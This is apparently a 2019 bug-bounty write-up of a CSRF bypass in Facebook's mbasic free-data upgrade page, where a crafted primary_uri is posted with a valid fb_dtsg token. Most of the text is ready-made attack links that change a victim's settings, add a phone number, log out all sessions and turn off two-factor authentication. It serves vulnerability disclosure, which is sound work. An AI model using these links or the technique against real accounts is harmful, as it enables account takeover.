Published On: 21 May 2019
CSRF Bypass in Use data To View Photos and Videos I'm looking for some Open Redirect in Facebook Free (Don't have internet that day) and came to the link like this: https://mbasic.facebook.com/free_fb/media/upgrade/… I add some links in primary and secondary uri but it fails to redirect.
The VULNERABILITY which I discover is producing a FB_DTSG which is like a hash for csrf. and the PRIMARY_URI is going in the ACTION= of the form with a METHOD=POST
The malicious link can do most of the possible proccess.
Step
1
Malicious link:
https://mbasic.facebook.com/free_fb/media/upgrade/?ref=m_settings&secondary_uri&primary_uri[POST METHOD LINKS WHICH REQUIRES ONLY A fb_dtsg TO EXECUTE]
Step
2
i can create a
tag with the action I can use in a method post form
for example i want to TURN OFF COMMENT RANKING THEN I WILL USE THIS LINK:
https://mbasic.facebook.com/free_fb/media/upgrade/?ref=m_settings&secondary_uri&primary_uri=%2Fsettings%2Fsubscribe%2Fsave%2F%3Fsetting%3Dranked_comments%26rankedcommentsetting%3D1
it will create a form tag:
form method="post" action="/settings/subscribe/save/?setting=ranked_comments&rankedcommentsetting=1&ref=m_settings"><input type="hidden" name="fb_dtsg" value="AQG0MX76NU5i:AQFxsjAGqiZR" autocomplete="off"><div class="v"><input value="Use Data" type="submit" class="w x y z ba"></div></form
then when I hit the USE DATA the form will be triggered together with fb_dtsg that produce by the link.
Step
3
These are some Links which is cover by the bypass.
COMMENT RANKING OFF
https://mbasic.facebook.com/free_fb/media/upgrade/?ref=m_settings&secondary_uri&primary_uri=%2Fsettings%2Fsubscribe%2Fsave%2F%3Fsetting%3Dranked_comments%26rankedcommentsetting%3D1
WHO CAN FOLLOW ME (FRIENDS)
https://mbasic.facebook.com/free_fb/media/upgrade/?ref=m_settings&secondary_uri&primary_uri=%2Fsettings%2Fsubscribe%2Fsave%2F%3Fsetting%3Dfollow_optin
LIMIT OLD POST
https://mbasic.facebook.com/free_fb/media/upgrade/?ref=m_settings&secondary_uri&primary_uri=%2Fprivacy%2Ftouch%2Fmasher%2Fwrite
SUPPORT INBOX NOTIFICATION OFF
https://mbasic.facebook.com/free_fb/media/upgrade/?ref=m_settings&secondary_uri&primary_uri=%2Fsupport%2Fnotifications%2Fdo_edit%2F%3Fdom%3Du_0_0
ACCOUNT DELETION FROM YES TO NO
https://mbasic.facebook.com/free_fb/media/upgrade/?ref=m_settings&secondary_uri&primary_uri=%2Fsettings%2Flegacy_contact%2Fdelete_account_save%2F%3Fref%3Dm_settings
ADDING PHONE NUMBER TO AN ACCOUNT
https://mbasic.facebook.com/free_fb/media/upgrade/?primary_uri=%2Fphoneacqwrite%2F%3Fcountry%3DPH%26state%3D1%26source%3Dm_account%26promo_type%26initial_contact_point%26contact_point%3D9950829805%26verification_type%3Dcode_sms%26activate_sms%3D1%26qp_id%3D0%26qp_conversion_token%26prefill_score%3D0&secondary_uri
LOGOUT ALL SESSIONS
https://mbasic.facebook.com/free_fb/media/upgrade/?secondary_uri&primary_uri=%2Fsecurity%2Fsettings%2Fsessions%2Flog_out_all%2F%3Fredirect%3D1
CHANGING LANGUAGE TO FILIPINO
https://mbasic.facebook.com/free_fb/media/upgrade/?secondary_uri&primary_uri=%2Fa%2Flanguage.php%3Fl%3Dtl_PH
TURNING OFF TWO-FACTOR AUTHENTICATION
https://mbasic.facebook.com/free_fb/media/upgrade/?secondary_uri&primary_uri=%2Fa%2Fsettings%2Fsecurity%2Fapprovals